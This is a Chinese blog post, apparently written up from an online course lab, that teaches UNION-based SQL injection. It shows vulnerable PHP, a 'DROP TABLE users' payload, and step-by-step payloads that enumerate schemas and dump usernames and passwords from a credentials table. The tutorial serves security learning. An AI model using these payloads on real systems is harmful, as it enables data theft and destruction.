<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.2.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.2.0" color="#222">






<link rel="stylesheet" href="/css/main.css?v=7.2.0">



  
  
  
  

  
    
    
  

  

  

  

  
    
      
    

    
  

  
    
    
    <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic|Roboto Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext">
  






<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">








<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.2.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="引言: This twofold use of knowledge, that is, knowledge can be used equally for good or eveil.">
<meta name="keywords" content="offensive,sqli">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入攻击示例 (UNION 注入)">
<meta property="og:url" content="http://alopex.cc/2022/01/12/sqli/index.html">
<meta property="og:site_name" content="Alopex">
<meta property="og:description" content="引言: This twofold use of knowledge, that is, knowledge can be used equally for good or eveil.">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://alopex.cc/2022/01/12/sqli/raghavendra-v-konkathi-v9Idw3hqkb4-unsplash.jpg">
<meta property="og:image" content="http://alopex.cc/2022/01/12/sqli/db_request.png">
<meta property="og:image" content="http://alopex.cc/2022/01/12/sqli/types_of_sqli.jpg">
<meta property="og:image" content="http://alopex.cc/2022/01/12/sqli/normal.png">
<meta property="og:image" content="http://alopex.cc/2022/01/12/sqli/single_quote.png">
<meta property="og:image" content="http://alopex.cc/2022/01/12/sqli/souce.png">
<meta property="og:image" content="http://alopex.cc/2022/01/12/sqli/config.png">
<meta property="og:updated_time" content="2022-01-17T07:12:28.436Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入攻击示例 (UNION 注入)">
<meta name="twitter:description" content="引言: This twofold use of knowledge, that is, knowledge can be used equally for good or eveil.">
<meta name="twitter:image" content="http://alopex.cc/2022/01/12/sqli/raghavendra-v-konkathi-v9Idw3hqkb4-unsplash.jpg">





  
  
  <link rel="canonical" href="http://alopex.cc/2022/01/12/sqli/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  
  <title>SQL注入攻击示例 (UNION 注入) | Alopex</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Alopex</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">止 定 静 安 虑 得</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://alopex.cc/2022/01/12/sqli/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Alopex Cheung">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Alopex">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入攻击示例 (UNION 注入)

              
            
          </h1>
        

        <div class="post-meta">

          
          
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2022-01-12 18:04:53" itemprop="dateCreated datePublished" datetime="2022-01-12T18:04:53+08:00">2022-01-12</time>
            </span>
          

          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2022-01-17 15:12:28" itemprop="dateModified" datetime="2022-01-17T15:12:28+08:00">2022-01-17</time>
              </span>
            
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/penetration/" itemprop="url" rel="index"><span itemprop="name">penetration</span></a></span>

                
                
                  ，
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/penetration/basic/" itemprop="url" rel="index"><span itemprop="name">basic</span></a></span>

                
                
              
            </span>
          

          
            
            
          

          
          

          

          

          <br>
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
              
                <span class="post-meta-item-text">本文字数：</span>
              
              <span title="本文字数">19k</span>
            </span>
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
              
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              
              <span title="阅读时长">32 分钟</span>
            </span>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="引言"><a href="#引言" class="headerlink" title="引言:"></a>引言:</h1><blockquote>
<p>This twofold use of knowledge, that is, knowledge can be used equally for good or eveil.</p>
</blockquote>
<a id="more"></a>

<h1 id="预备知识"><a href="#预备知识" class="headerlink" title="预备知识"></a>预备知识</h1><ul>
<li>具备网站交互基本知识</li>
<li>具备数据库基本知识<ul>
<li>具备SQL语言的基本操作知识</li>
</ul>
</li>
</ul>
<h1 id="正文内容"><a href="#正文内容" class="headerlink" title="正文内容"></a>正文内容</h1><p><img src="raghavendra-v-konkathi-v9Idw3hqkb4-unsplash.jpg" alt="inject"><br>本文的内容来自网络课程练习，而非真实生产环境。主要目的是梳理近来学习的知识，编辑成文，以便个人往后回顾之用。如你意外阅读到该内容，请遵守当地相应的法律法规，切记合法合理使用工具和知识，不要怀有侥幸心理，以免失足坠入深渊，难以自拔。<br>如你继续浏览，将表明你同意不将其后学习的知识用在非法途径上，仅此。<br>闲话说完，开始正文。</p>
<h2 id="SQL注入基本介绍"><a href="#SQL注入基本介绍" class="headerlink" title="SQL注入基本介绍"></a>SQL注入基本介绍</h2><ul>
<li><p>背景</p>
<ul>
<li><p>在现代的网络应用结构中，服务端在浏览器侧，服务端在远程服务器侧。访问的发生：用户使用浏览器（只要符合HTTP/HTPS协议的工具即可 curl, wget也是可行的）提交URL指定需要访问的网站，网站反馈前端的静态页面（这里省略DNS,CDN等多个过程，主要关注用户端和服务端的交互），当用户尝试在页面执行如登录或搜索的作时，用户的请求通过前端的web服务器页面提交到应用服务器（其多运行php,java,python代码），应用服务器执行部分逻辑代码，当需要使用数据时，则唤醒后端的数据库服务器（Access, MySQL, SQL Server, Oracle, PostgreSQL）。</p>
</li>
<li><p>该流程如下图所示</p>
<p><img src="db_request.png" alt="db request"></p>
</li>
<li><p>在这个模型中，用户端通过网络应用访问数据库服务器而无需通过帐号密码登录。数据库的安全性，无形之中转移到了网络应用开发者和数据库管理员的身上，他们的一个逻辑的漏洞那个或配置的疏忽都将会成为攻击者手中可以利用的漏洞，轻则对服务器文件进行读取，重则可以对服务器进行后门的植入，获得如同管理员一般的权限。</p>
</li>
</ul>
</li>
<li><p>SQLi的含义</p>
<ul>
<li>为了让用户能更好地使用仿佛，网络应用一般配备了多个输入框，等待用户发出请求。即使是最简陋的网络应用，注册好帐号让用户登录，至少也需要一对用户密码输入的输入框。用户输入帐号名和密码后，应用服务器调用数据库服务器的数据进行比对，确认用户身份。这个时候，SQL就出现了，虽然用户本身从来未编写SQL访问语句，但是应用服务器与数据库交就包含了SQL语言（无论是明的SQL构建，疑惑是调用了其他库代码）。SQL语言是和数据库交互的重要语言，普通用户最多也就只有随意输入的能耐，但当网络应用面对的*是一个了解SQL语言的恶意用户，情况就会变得复杂了。这位而已用户，就会利用SQL的特性，在输入对话框中，输入相关的SQL语句，偏离对话框设定的预设用用途，恶意对数据库进行访问。这种通过在输入对话框（有时候也存在于URL）中输入SQL非法访问数据库的做法，就被称为SQL注入（Injection）。</li>
</ul>
</li>
<li><p>NoSQL</p>
<ul>
<li>当前较为常用的数据库依然是<code>关系型数据库</code>，其数据库的交互方式便是使用SQL语言。目前还有一类较为火的数据库，被称为NoSQL（Non-relational Databases）。关系型数据库其存储模型是一个表格，非关系型数据库存储模型比较多样：包括K-V键值对,图存储，对象存储。需要注意一点NoSQL是不支持SQL语句,最流行的NoSQL是MongoDB。 NoSQL也有其相应的攻击方式，被称为<code>NoSQL Injections</code>，它和SQL注入有较大的区别，也不是本文讨论的重点。</li>
</ul>
</li>
<li><p>SQLi的方式</p>
<ul>
<li><p>In-band SQLi (Classic SQLi): 带内SQL注入是最常规也是最容易被利用的SQL攻击。在简单的情况下，预期查询和新查询的输出都可以直接打印在前端，我们可以直接读取。这将会是带内攻击的一个常规场景。</p>
<ul>
<li>Error-based SQLi：基于错误信息的SQLi是一个常会被利用的SQL攻击。在应用系统开发的过程中，使用错误信息提示开发者是十分常见的，但如果该代码在最终系统上出现，将会是一个极其危险的漏洞。</li>
<li>Union-based SQLi (本文介绍)：基于Union的SQLi是利用SQL语句<code>UNION</code>操作，对数据库表格进行合并操作，通过联合多个<code>SELECT</code>语句生成单一结果并在相关位置进行显示的攻击。</li>
</ul>
</li>
<li><p>Inferential SQLi (Blind SQLi)：有些时候，我们无法将SQL攻击得到的内容直接现在到页面上，这种场景的攻击被称为盲带攻击。攻击者将通过发送有效负载、观察 Web 应用程序的响应以及数据库服务器的最终行为来重建数据库结构。</p>
<ul>
<li>Boolean-based (content-based) Blind SQLi：基于布尔的SQL注入是一种推理式的SQL注入技术，它依赖于向数据库发送一个SQL查询，迫使应用程序根据查询返回的结果是TRUE还是FALSE而返回不同的结果。根据不同的结果，HTTP响应中的内容将改变，或保持不变。这允许攻击者推断出所使用的有效载荷是返回真还是假，即使没有返回数据库的数据。这种攻击通常很慢(特别是在大型数据库上)，因为攻击者需要逐个字符地列举数据库。</li>
<li>Time-based Blind SQLi：基于时间的SQL注入是一种推理式SQL注入技术，它依赖于向数据库发送一个SQL查询，迫使数据库在响应前等待指定的时间(以秒为单位)。响应时间将向攻击者表明查询的结果是真还是假。根据结果，HTTP响应将被延迟返回或立即返回。这允许攻击者推断所使用的有效载荷是返回真还是假，即使没有返回数据库的数据。这种攻击同样也需要耗费很长的时间在枚举数据库上。</li>
</ul>
</li>
<li><p>Out-of-band SQLi：这种注入方式并不常见。在某些情况下，我们可能无法直接访问输出，因此我们可能必须将输出定向到远程位置，“即 DNS 记录”，然后尝试从那里检索它。这称为带外 SQL 注入。</p>
<p><img src="types_of_sqli.jpg" alt="family"></p>
</li>
</ul>
</li>
</ul>
<h2 id="SQL注入的基本流程"><a href="#SQL注入的基本流程" class="headerlink" title="SQL注入的基本流程"></a>SQL注入的基本流程</h2><ul>
<li><p>SQL 攻击往往源自没有对用户输入内容进行“清洗”所导致的，网络应用里所有的输入框，都应该加以防范。一旦掉以轻心，就很容易成为他人利用的一个漏洞。</p>
</li>
<li><p>假设以下代码是查询用户是否在系统中存在的源代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$conn = <span class="keyword">new</span> mysqli(<span class="string">"localhost"</span>, <span class="string">"root"</span>, <span class="string">"password"</span>, <span class="string">"users"</span>);   <span class="comment"># 连接数据库</span></span><br><span class="line">$searchInput =  $_POST[<span class="string">'findUser'</span>];                             <span class="comment"># 用户输入</span></span><br><span class="line">$query = <span class="string">"select * from logins where username like '%$searchInput'"</span>;  </span><br><span class="line">                    <span class="comment"># 拼接查询字段,查看用户输入内容是否在`logins`表格的`username`字段中</span></span><br><span class="line">$result = $conn-&gt;query($query);                                 <span class="comment"># 通过数据库提交SQL语句</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>在以上的<code>php</code>代码中，没有对用户信息进行任何的过滤。假如这是一位恶意用户，其输入<code>%1&#39;; DROP TABLE users</code>，边足以让数据库执行删除<code>users</code>这一数据表。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> logins <span class="keyword">where</span> username <span class="keyword">like</span> <span class="string">'%1'</span>; <span class="keyword">DROP</span> <span class="keyword">TABLE</span> <span class="keyword">users</span>;'</span><br></pre></td></tr></table></figure>
</li>
<li><p>以下将尝试提供一个较为完整的 UNION SQL注入实例</p>
<ul>
<li><p>准备内容</p>
<ul>
<li><p>SQL相关字符在URL中的转换</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">+---------+-------------+</span><br><span class="line">| Payload | URL Encoded |</span><br><span class="line">+---------+-------------+</span><br><span class="line">| &apos;       | %27         |</span><br><span class="line">| &quot;       | %22         |</span><br><span class="line">| #       | %23         |</span><br><span class="line">| ;       | %3B         |</span><br><span class="line">| )       | %29         |</span><br><span class="line">+---------+-------------+</span><br></pre></td></tr></table></figure>
</li>
<li><p>mysql 的注释方式 <code>--</code>, <code>#</code></p>
<ul>
<li>由于仅使用<code>--</code> 不足以实现注释，一般其后需要跟上空格<code></code>, 因此注释一般是<code>-- -</code>, 第三个<code>-</code>仅仅是为了表明有空格</li>
<li><code>#</code>在浏览器中会被认为是特殊字符，需要转换为<code>%23</code>才能使用</li>
<li>综上，一般注释使用<code>-- -</code></li>
</ul>
</li>
</ul>
</li>
<li><p>背景： 当前有一网站，<a href="http://ip.ip.ip.ip:port/search.php&#39;" target="_blank" rel="noopener">http://ip.ip.ip.ip:port/search.php&#39;</a></p>
</li>
<li><p>判断sql：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> xxx <span class="keyword">where</span> port_code = <span class="string">'&#123;YOUR_QUERY&#125;'</span></span><br></pre></td></tr></table></figure>

<p><img src="normal.png" alt="normal"></p>
</li>
<li><p>当我们在输入栏输入<code>&#39;</code>后点击<code>search</code>后，发现地址栏出现了变化（参数的传递），并且在页面下出现了报错信息</p>
<p><img src="single_quote.png" alt="single quote"></p>
</li>
</ul>
</li>
</ul>
<h3 id="数据库基本信息的获得"><a href="#数据库基本信息的获得" class="headerlink" title="数据库基本信息的获得"></a>数据库基本信息的获得</h3><ol>
<li><p>获得当前数据表格/SCHEMA的行数（通过 order by）</p>
<ul>
<li><p>输入<code>cn&#39; order by 1 -- -</code></p>
<ul>
<li><code>cn&#39;</code> 搜索占位，刷去不需要的数据库显示内容</li>
<li>输入 <code>&#39; order by X -- -</code></li>
<li>前面的的<code>&#39;</code> 用于配对服务器<code>&#39;YOUR_QUERY&#39;</code>，左边的<code>&#39;</code>,使其凑成一个配对，后续进行我们需要的操作</li>
<li>order by N, 根据第N行进行排列，N是整数，数字可从1开始逐一递增到10..11,直至显示错误提示信息（<code>Unknow column X in &#39;order clause&#39;</code>）,该显示表明当前的N已超过了表格列的范围，因此表格的最终行数为<code>N-1</code></li>
</ul>
</li>
<li><p><a href="http://167.99.202.131:32451/search.php?port_code=&#39;" target="_blank" rel="noopener">http://167.99.202.131:32451/search.php?port_code=&#39;</a> order by 1 – -</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">order</span> <span class="keyword">by</span> X <span class="comment">-- -'</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br><span class="line">| port code | port city | port volume |</span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br><span class="line"></span><br><span class="line">Unknow <span class="keyword">column</span> X <span class="keyword">in</span> <span class="string">'order clause'</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>获得当前在表格视图中，使用的行列信息 （通过 UNION）</p>
<ul>
<li>输入<code>cn&#39; union select 1,2,3,4 -- -</code></li>
<li>UNION 需要结合和表格相同的列数使用，这也是为什么需要第一步</li>
<li>假设我们第一步，输入N为5时触发了<code>Unknow</code>信息，因此表格/SCHEMA的大小为4</li>
<li>让信息在表格中相应显示，让我们知道目前表格信息使用了哪几列，便于后续展示使用</li>
<li>此处可以发现，使用到的列为<code>2,3,4</code>，估计第一列应该是<code>ID</code>信息<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> \</span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="comment">-- -'</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br><span class="line">| port code | port city | port volume |</span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br><span class="line">|         <span class="number">2</span> |         <span class="number">3</span> |           <span class="number">4</span> |</span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>获得当前数据库的版本以及用户信息 （让信息在给定表格中显示）</p>
<ul>
<li>输入<code>cn&#39; union select null,@@version,user(),null -- -</code></li>
<li>第一个<code>NULL是占位置无法显示的</code>, 最后一个NULL也没有意义，</li>
<li><code>@@version</code>是版本信息</li>
<li><code>user()</code>查看用户信息<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="literal">null</span>,@@<span class="keyword">version</span>,<span class="keyword">user</span>(),<span class="literal">null</span>, <span class="comment">-- -'</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">---------------------------+----------------+-------------+</span></span><br><span class="line">|         port city         |   port city    | port volume |</span><br><span class="line">+<span class="comment">---------------------------+----------------+-------------+</span></span><br><span class="line">| <span class="number">10.3</span><span class="number">.22</span>-MariaDB<span class="number">-1</span>ubuntu1  | root@localhost |             |</span><br><span class="line">+<span class="comment">---------------------------+----------------+-------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>获得其他数据库/SCHEMA名称</p>
<ul>
<li>输入<code>cn&#39; union select null,SCHEMA_NAME,null,null from INFORMATION_SCHEMA.SCHEMATA -- -</code></li>
<li>查看存放数据库元信息的数据库(数据的名称，表格名称等等)<code>INFORMATION_SCHEMA</code>的表格(试图的元数据)<code>SCHEMATA</code><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">''</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="literal">null</span>,SCHEMA_NAME,<span class="literal">null</span>,<span class="literal">null</span> \</span><br><span class="line"><span class="keyword">from</span> INFORMATION_SCHEMA.SCHEMATA <span class="comment">-- -'</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">--------------------+-----------+-------------+</span></span><br><span class="line">|     port city      | port city | port volume |</span><br><span class="line">+<span class="comment">--------------------+-----------+-------------+</span></span><br><span class="line">| information_schema |           |             |</span><br><span class="line">| mysql              |           |             |</span><br><span class="line">| performance_schema |           |             |</span><br><span class="line">| ilfreight          |           |             |</span><br><span class="line">| dev                |           |             |</span><br><span class="line">+<span class="comment">--------------------+-----------+-------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>获得当前使用的数据库/SCHEMA名称</p>
<ul>
<li>输入<code>&#39; union select null,database(),null,null -- -</code></li>
<li>使用函数<code>database()</code>查看<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> \</span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="literal">null</span>,<span class="keyword">database</span>(),<span class="literal">null</span>,<span class="literal">null</span> <span class="comment">-- -'</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br><span class="line">| port city | port city | port volume |</span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br><span class="line">| ilfreight |           |             |</span><br><span class="line">+<span class="comment">-----------+-----------+-------------+</span></span><br></pre></td></tr></table></figure>


</li>
</ul>
</li>
</ol>
<ol start="6">
<li>获得数据库/SHCEMA <code>dev</code>所包含的表格<ul>
<li>输入<code>cn&#39; union select null,TABLE_NAME,table_schema,null from information_schema.tables where table_schema=&#39;dev&#39; -- -</code></li>
<li>联合元表格中<code>table_schema</code>字段中有<code>dev</code>的内容</li>
<li>在表格的第一列输出表格名称<code>TABLE_NAME</code>, 第二列输出<code>数据库/SCHEMA</code><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">''</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="literal">null</span>,TABLE_NAME,table_schema,<span class="literal">null</span> <span class="keyword">from</span> information_schema.tables \</span><br><span class="line"><span class="keyword">where</span> table_schema=<span class="string">'dev'</span> <span class="comment">-- -</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-------------+-----------+-------------+</span></span><br><span class="line">|  port city  | port city | port volume |</span><br><span class="line">+<span class="comment">-------------+-----------+-------------+</span></span><br><span class="line">| framework   | dev       |             |</span><br><span class="line">| pages       | dev       |             |</span><br><span class="line">| credentials | dev       |             |</span><br><span class="line">| posts       | dev       |             |</span><br><span class="line">+<span class="comment">-------------+-----------+-------------+</span></span><br></pre></td></tr></table></figure>


</li>
</ul>
</li>
</ol>
<ol start="7">
<li><p>获得数据库/SCHEMA<code>dev</code>表格<code>credentials</code>相应的列名称</p>
<ul>
<li>输入<code>cn&#39; union select 1, column_name,table_name,table_schema from information_schema.columns where table_name=&#39;credentials&#39; -- -</code></li>
<li><code>column_name</code> 提取出行名称<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="literal">null</span>, column_name,table_name,table_schema \</span><br><span class="line"><span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'credentials'</span> <span class="comment">-- -</span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-----------+-------------+-------------+</span></span><br><span class="line">| port city |  port city  | port volume |</span><br><span class="line">+<span class="comment">-----------+-------------+-------------+</span></span><br><span class="line">| username  | credentials | dev         |</span><br><span class="line">| <span class="keyword">password</span>  | credentials | dev         |</span><br><span class="line">+<span class="comment">-----------+-------------+-------------+</span></span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>获得dev这个数据/SCHEMA中<code>credentials</code>表格<code>username</code>和<code>password</code>相关的数据</p>
<ul>
<li>输入<code>cn&#39; union select null, username, password, null from dev.credentials -- -</code></li>
<li><code>dev.credentials</code> 访问的相关表格</li>
<li><code>username</code>和<code>password</code>访问的相关信息<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> * <span class="keyword">from</span> XXX <span class="keyword">where</span> port_code =<span class="string">'cn'</span> <span class="keyword">union</span> \</span><br><span class="line"><span class="keyword">select</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="literal">null</span>, username, <span class="keyword">password</span>, <span class="literal">null</span> <span class="keyword">from</span> dev.credentials <span class="comment">-- - </span></span><br><span class="line"></span><br><span class="line">+<span class="comment">-----------+-------------+-------------+</span></span><br><span class="line">| port city |  port city  | port volume |</span><br><span class="line">+<span class="comment">-----------+-------------+-------------+</span></span><br><span class="line">| user1     |*my_password |             |</span><br><span class="line">+<span class="comment">-----------+-------------+-------------+</span></span><br></pre></td></tr></table></figure>

</li>
</ul>
</li>
</ol>
